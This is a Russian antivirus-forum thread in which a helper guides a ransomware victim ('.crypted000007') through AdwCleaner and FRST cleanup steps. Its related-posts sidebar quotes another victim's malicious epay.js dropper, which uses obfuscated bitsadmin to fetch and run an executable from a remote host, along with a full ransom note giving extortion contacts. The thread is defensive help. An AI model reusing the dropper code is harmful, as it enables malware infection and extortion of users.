Перейти к содержанию
20 лет клубу! Куда отправится Kaspersky Club? Угадай локацию!

Файлы зашифрованы "CRYPTED000007" (.crypted000007)

Фекла
 Поделиться

Рекомендуемые сообщения

Фекла

Фекла

Опубликовано
Опубликовано (изменено)

День добрый, прошу помочь. Поймал вирус. Теперь все файлы зашифрованы Файл "CRYPTED000007" (.crypted000007). Антивирусом ДрВеб и Касперским компьютер проверен вирусы вылечены. Но интересно уязвимость осталась? Требуются дополнительные действия?

CollectionLog-2017.12.15-14.34.zip

Изменено пользователем Фекла
  • Ответов 33
  • Создана
  • Последний ответ

Топ авторов темы

  • Фекла

    17

  • Sandor

    16

  • regist

    1

Топ авторов темы

Изображения в теме

Sandor

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Через Панель управления - Удаление программ - удалите нежелательное ПО:

MediaGet

Unity Web Player

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[sx].txt.
  • Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Sandor

Sandor

Опубликовано
Опубликовано

1.

  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • Нажмите кнопку "Scan" ("Сканировать").
  • По окончании сканирования в меню Инструменты - Настройки отметьте дополнительно в разделе Сбросить:
    • Политики IE
    • Политики Chrome

      и нажмите Ok.

  • Нажмите кнопку "Clean" ("Очистить") и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[Cx].txt.
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

 

2.

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Отметьте галочкой также "Shortcut.txt".

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Sandor

Sandor

Опубликовано
Опубликовано

AdwCleaner - завершил работу с ошибкой. Это нормально?

Нет, не нормально. Только Вы прикрепили не тот лог. Нужен с символом [C], а не
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

    Start::
CreateRestorePoint:
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
GroupPolicyUsers\S-1-5-21-959131880-3149337325-1822866914-1004\User: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-959131880-3149337325-1822866914-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/search?q={SearchTerms}&fr=ntg
BHO-x32: No Name -> {323C6E6D-1621-470F-8A52-4FDEC4E75E40} -> No File
Toolbar: HKU\S-1-5-21-959131880-3149337325-1822866914-1001 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
2017-12-14 19:50 - 2017-12-14 19:50 - 003148854 _____ C:\Users\Пользователь\AppData\Roaming\4C6027804C602780.bmp
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README9.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README8.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README7.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README6.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README5.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README4.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README3.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README2.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README10.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Пользователь\Desktop\README1.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README9.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README8.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README7.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README6.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README5.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README4.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README3.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README2.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README10.txt
2017-12-14 19:50 - 2017-12-14 19:50 - 000004154 _____ C:\Users\Public\Desktop\README1.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README9.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README8.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README7.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README6.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README5.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README4.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README3.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README2.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README10.txt
2017-12-13 20:51 - 2017-12-13 20:51 - 000004154 _____ C:\README1.txt
2017-12-13 20:50 - 2017-12-14 20:37 - 000000000 __SHD C:\ProgramData\Windows
2017-08-22 20:08 - 2017-08-21 22:20 - 001314008 _____ (Mail.Ru) C:\Users\MESSI.Пользователь-ПК\AppData\Local\Temp\6c53-feb6-9123-b990.exe
2016-12-19 15:04 - 2017-12-13 17:30 - 007258865 _____ () C:\Users\MESSI.Пользователь-ПК\AppData\Local\Temp\amigo_setup.exe
2016-11-30 18:31 - 2016-11-30 18:31 - 000181544 _____ () C:\Users\MESSI.Пользователь-ПК\AppData\Local\Temp\downloader.exe
2017-01-21 21:03 - 2017-07-03 21:44 - 004087000 _____ (Mail.Ru) C:\Users\MESSI.Пользователь-ПК\AppData\Local\Temp\mrutmp.exe
2017-01-09 21:15 - 2017-01-09 21:15 - 000730830 ____T () C:\Users\MESSI.Пользователь-ПК\AppData\Local\Temp\VkontakteDJ_update0986395010.exe
2017-05-01 00:31 - 2017-05-01 00:31 - 000059670 ____T () C:\Users\MESSI.Пользователь-ПК\AppData\Local\Temp\VkontakteDJ_update5633712005.exe
2017-01-10 10:17 - 2017-01-10 10:17 - 000337620 ____T () C:\Users\MESSI.Пользователь-ПК\AppData\Local\Temp\VkontakteDJ_update8417641130.exe
2017-12-15 16:53 - 2017-12-15 16:53 - 000182568 _____ () C:\Users\Пользователь\AppData\Local\Temp\mediaget-uninstaller.exe
Reboot:
End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

 

 

Видны два антивируса

Kaspersky Free

Kaspersky Internet Security

Удалите оба и установите один.
Sandor

Sandor

Опубликовано
Опубликовано

Пожалуйста, проделайте следующее:

  • Запустите повторно AdwCleaner
  • Выберите в меню Инструменты - Настройки
  • В разделе Режим отметьте Отладка
  • Нажмите ОК
  • Повторите Очистку.
Подождите, пока произойдет сбой.

Отчёт отладки (C:\AdwCleaner\AdwCleaner_Debug.log) прикрепите к следующему сообщению.

Sandor

Sandor

Опубликовано
Опубликовано

лог с символом (С)

по-прежнему отсутствует?
Фекла

Фекла

Опубликовано
  • Автор
Опубликовано

Подтверждаю лог с символом (С) отсутствует

Периодически вываливается окно  RunDLL

post-48361-0-92400100-1513587569_thumb.jpg

Sandor

Sandor

Опубликовано
Опубликовано

Сделайте так:

Запустите AdwCleaner, нажмите кнопку Сканирование.

По окончании повторите инструкцию из сообщения №8

Фекла

Фекла

Опубликовано
  • Автор
Опубликовано

Запустил AdwCleaner от имени администратора. Внес изменения из 8 собщения. Выполнил сканирование, а после этого нажал очистку(случайно) выпало окно с ошибкой. Лог с символом (С) не появился

post-48361-0-46591100-1513588897_thumb.jpg

post-48361-0-38610900-1513588918_thumb.jpg

AdwCleanerS3.txt

AdwCleaner_Debug.log

Sandor

Sandor

Опубликовано
Опубликовано (изменено)

Внес изменения из 8 собщения. Выполнил сканирование

Все-таки не так.

 

Проделайте в такой последовательности:

 

1.

  • Запустите AdwCleaner (by Malwarebytes) (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[sx].txt.
  • Прикрепите отчет к своему следующему сообщению.
2.

Далее:

  • Запустите повторно AdwCleaner
  • Выберите в меню Инструменты - Настройки
  • В разделе Режим отметьте Отладка
  • Нажмите ОК
  • Нажмите Очистка.
Подождите, пока произойдет сбой.

Отчёт отладки (C:\AdwCleaner\AdwCleaner_Debug.log) прикрепите к следующему сообщению. Если появится C:\AdwCleaner\AdwCleaner[Cx].txt - его тоже прикрепите.

Изменено пользователем Sandor

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Rumpelstiltskin
      Вирус зашифровал все файлы.
      Автор Rumpelstiltskin
      Вирусный файл epay.js зашифровал все файлы, вот содержимое: var lildz = new ActiveXObject("shell.application");  var am = String.fromCharCode( 99,109,100,46,101)  var kk = " h^ttp://selfpaymarket.com/1110.exe %appdata%\kes.exe     &start %appdata%\kes.exe"  lildz.ShellExecute (am+"xe"," /c bitsadmin   /tran^sfer my^job /do^wnload /prio^rity hi^gh"+kk, '', 'open',0);   README1.txt Bаши файлы былu зашифpовaны. Чmобы pacшифрoваmь ux, Вaм нeобxoдuмо отnравumь kод: EF632BE58468CCDF21F4|0 нa электрoнный адpеc robertamacdonald1994@gmail.com . Далee вы пoлучитe вcе неoбxодuмые uнстрyкциu. Попыmки раcшuфpоваmь сaмостoяmельнo нe приведуm нu k чему, kpомe бeзвoзврaтнoй nomерu uнфopмациu. Если вы всё жe хomите nonыmатьcя, mо npeдваpитeльно cделайте pезеpвные коnии файлoв, иначе в cлучае ux изменения раcшuфpoвka станеm нeвозмoжной нu npu кaких уcлoвuяx. Eслu вы не полyчилu oтвemа пo вышeуkaзаннoму aдpeсy в meчeниe 48 чaсoв (и тoлько в эmом случae!), вocnoльзyйmеcь формой обpаmной связи. Это мoжно cделamь двумя cnocобамu: 1) Скачaйme и уcmановumе Tor Browser пo ссылке: https://www.torproject.org/download/download-easy.html.en В адpecнoй стpоkе Tor Browser-а ввeдume адpес: http://cryptsen7fo43rr6.onion/ и нaжмuте Enter. 3аrрyзиmcя стpaницa с фopмой oбpaтнoй связи. 2) B любом бpаузepe nepeйдuтe no oднoму uз aдрecoв: http://cryptsen7fo43rr6.onion.to/ http://cryptsen7fo43rr6.onion.cab/     All the important files on your computer were encrypted. To decrypt the files you should send the following code: EF632BE58468CCDF21F4|0 to e-mail address robertamacdonald1994@gmail.com . Then you will receive all necessary instructions. All the attempts of decryption by yourself will result only in irrevocable loss of your data. If you still want to try to decrypt them by yourself please make a backup at first because the decryption will become impossible in case of any changes inside the files. If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!), use the feedback form. You can do it by two ways: 1) Download Tor Browser from here: https://www.torproject.org/download/download-easy.html.en Install it and type the following address into the address bar: http://cryptsen7fo43rr6.onion/ Press Enter and then the page with feedback form will be loaded. 2) Go to the one of the following addresses in any browser: http://cryptsen7fo43rr6.onion.to/ http://cryptsen7fo43rr6.onion.cab/  
      Addition.txt
      FRST.txt
      Shortcut.txt
    • Егор Наумов
      da_vinci_code зашифровал данные
      Автор Егор Наумов
      da_vinci_code зашифровал данные
      логи в архиве
      ЮЗАО.zip
    • den30678
      Зашифровано da_vinci_code
      Автор den30678
      Доброго времени суток, поздно заметили что вирус зашифровал большую часть файлов. Прошу помощи, потому как облазил всё что можно было. Жесткий диск на котором было всё к сожалению был форматирован и установлена чистая ОС. Я даже пытаться не стал забрать этот жесткий и повозиться с ним, зато эти люди скопировали файлы все что были зашифрованы. Нашёл часть файлов в оригинале из старых бекапов, и решил обратиться к вам. В архиве приложены зашифрованные и оригинальные файлы. какие из них соответствуют оригиналом установить не удалось, т.к. даже размер разный. Прошу помощи, может кто поможет.
      F.zip
    • Игорь1313
      da_vinci_code вирус-шифровальщик
      Автор Игорь1313
      Вирус зашифровал все файлы помогите 
    • Анастасия Рысь
      шифровальщик da vinchi
      Автор Анастасия Рысь
      на компьютеры файлы зашифровались шифровальщиком da vinchi. во вложенном файле сборщик логов.
      CollectionLog-2016.10.11-16.11.zip
×
×
  • Создать...